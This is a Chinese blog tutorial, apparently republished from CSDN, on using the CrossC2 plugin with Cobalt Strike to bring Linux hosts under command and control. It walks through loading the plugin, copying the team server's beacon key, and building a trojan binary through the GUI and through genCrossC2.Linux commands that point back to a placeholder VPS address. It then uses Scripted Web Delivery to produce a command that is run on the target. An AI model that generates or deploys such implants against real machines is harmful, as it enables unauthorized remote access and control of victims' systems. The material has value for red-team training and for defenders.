标签：文件 插件 上线 CrossC2 vps v3.0 genCrossC2 cs

目录

• • • • 一、起因
      • 二、安装
      • • 1）客户端配置
        • 2）vps服务端操作
        • 3）客户端cs操作
      • 三、上线
      • • 1）二进制木马文件上线
        • 2）命令行上线

一、起因

cobaltstike默认只生成windows载荷，不能上线linux主机，想上线linux主机需要通过ssh回话的方式，CrossC2可以通过生成linux载荷直接上线linux主机（或Mac）
项目地址：https://github.com/gloxec/CrossC2/
参考地址：https://gloxec.github.io/CrossC2/zh_cn/

二、安装

需要准备
vps上的cs的key文件：.cobaltstrike.beacon_keys（该文件隐藏）
CrossC2的配置文件：CrossC2-GithubBot-2021-11-02.cna
以及二进制文件：genCrossC2.MacOS和genCrossC2.Linux等
cs4.0测试

1）客户端配置

下载项目地址，或者直接下载对应的genCrossC2.版本和cna文件，我这里没有下载整个项目文件，而是创建一个crossc2目录，里面下载了如下几个文件：

编辑cna配置文件，修改两个全局变量的参数CC2_PATH和CC2_BIN，这里要上线linux主机，所以CC2_BIN选择genCrossC2.Linux，CC2_PATH是插件所在的绝对路径

从vps上拷贝下来key文件，我这里直接放在crossc2目录里面一起了，key文件是对应cs版本目录底下的隐藏文件，复制的时候注意一下即可

2）vps服务端操作

正常打开cs，teamserver等等等

3）客户端cs操作

cs左上角Cobalt Strike–>Script manager脚本管理，然后load加载cna文件即可安装到cs上

三、上线

1）二进制木马文件上线

创建https监听之后使用crossc2插件，由于我使用的crossc2是v3.0.2新版本，所以和网上的教程有些不同（不影响使用）

设置好对应的选项然后build即可生成木马t_cc2.out
在目标linux主机上执行即可完成上线

另一种木马制作方式：在命令行使用crossc2直接生成
./genCrossC2.Linux [vps-ip] [vps-ip-port] ./.cobaltstrike.beacon_keys null Linux x64 test2

./genCrossC2.Linux [vps-ip] [vps-ip-port] null null Linux x64 test3

不指定秘钥文件生成

实际测试中由于网络原因上线失败，同时该过程不包含免杀

2）命令行上线

CrossC2–>Sripted Web Delivery(s)

复制命令在目标机器上执行即可

久违
2022.2.9

标签：文件,插件,上线,CrossC2,vps,v3.0,genCrossC2,cs
来源： https://blog.csdn.net/weixin_42742658/article/details/122844041

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。